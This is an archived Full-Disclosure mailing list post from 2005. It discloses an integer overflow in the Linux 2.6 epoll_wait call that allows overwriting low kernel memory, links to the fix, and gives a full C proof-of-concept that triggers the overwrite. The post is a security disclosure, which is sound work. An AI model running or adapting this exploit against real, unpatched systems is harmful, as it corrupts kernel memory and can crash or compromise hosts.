[Full-disclosure] overwriting low kernel memory

From: Georgi Guninski (guninski_at_guninski.com)
Date: 03/09/05

  • Next message: John Cartwright: "[Full-disclosure] List Charter" 
    Date: Wed, 9 Mar 2005 12:42:19 +0200
To: full-disclosure@lists.grok.org.uk

    it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) memory
    due to integer overflow in sys_epoll_wait and misuse of __put_user
    in ep_send_events

    tested on i386.
    despite the overflow, the os seemingly continues normal operation.

    fix:
    http://linux.bkbits.net:8080/linux-2.6/cset@422dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d

    -------------------------------------------------
    /*
     * copyright georgi guninski.
     * cannot be used in vulnerabilities databases like securityfocus and mitre
     * */
    #include <stdio.h>
    #include <sys/epoll.h>
    #include <sys/socket.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <stdlib.h>
    #define __KERNEL__
    #include <asm/processor.h>
    #undef __KERNEL__

    #define MAXV 500

    int main(int argc,char ** argv)
    {
    int epfd;
    int i;
    int res;
    struct epoll_event ev;
    int *fds;
    int over;
    void *km;

    over= ((unsigned int)-1)/sizeof(struct epoll_event)+1;
    km=(void *)(TASK_SIZE - over*sizeof(struct epoll_event) - 4);
    printf("sizeof=%d %x %lx\n",sizeof(struct epoll_event),over,(unsigned long)km);

            epfd = epoll_create(MAXV);
            printf("Epoll descriptor %i\n",epfd);
            fds=calloc(2*MAXV,sizeof(int));
    for(i=0;i<MAXV;i++)
    {
            if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2*i])) perror("pair");
            ev.data.u32 = 0x42424242;
            ev.events = EPOLLOUT|EPOLLIN | 0x42424242;
            res = epoll_ctl(epfd,EPOLL_CTL_ADD,fds[2*i],&ev);
    }
    for(i=0;i<MAXV;i++) write(fds[2*i+1],&i,sizeof(i));

    system("sync");

            for(i = 0; i < 1; i++)
            {
                    res = epoll_wait(epfd,km,over,-1);
                    printf("epoll_wait returned %i\n",res);
                           printf("check what is after TASK_SIZE\n");
            }

            close(epfd);
            return 42;
    }
    ----------------------------------------- 

    -- 
where do you want bill gates to go today?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/
  • Next message: John Cartwright: "[Full-disclosure] List Charter"

    Relevant Pages

    • FreeBSDs malloc problem ?
      ... opensource project's config file and look what happened: ... the integer overflow will not become reality because the program will try ... in rare situations like the one I presented ... int is_definition ...
      (freebsd-hackers)
    • Re: how to use recursive algorithm to determine all of the arrangements?
      ... The simplest way is to check for integer overflow is to do the multiplication in floating point precision, and check if the result is larger than what would fit in whatever primitive type you're trying to store the value in. ... In the case of int, you could use long instead of double. ... so that if there is no overflow temp does ... public static void main{ ...
      (comp.lang.java.programmer)
    • Re: Catching integer overflow
      ... checks for the overflow flag and terminates the ... function is activated when an integer overflow occurs. ... int add_i ... i don't really know what two's complement is. ...
      (comp.lang.c)
    • Re: which functions set the end-of-file indicator?
      ... the size of int? ... conversion of (unsigned char)EOF to an int, ... putc not failing ... When the Standard says that upon integer overflow ...
      (comp.lang.c)
    • [git patches] net driver updates for .26
      ... Fix a bug where the pointer never moves for dma_unmap... ... Update and fix driver debugging messages ... int reset); ... * header structure can be anywhere in the mcp. ...
      (Linux-Kernel)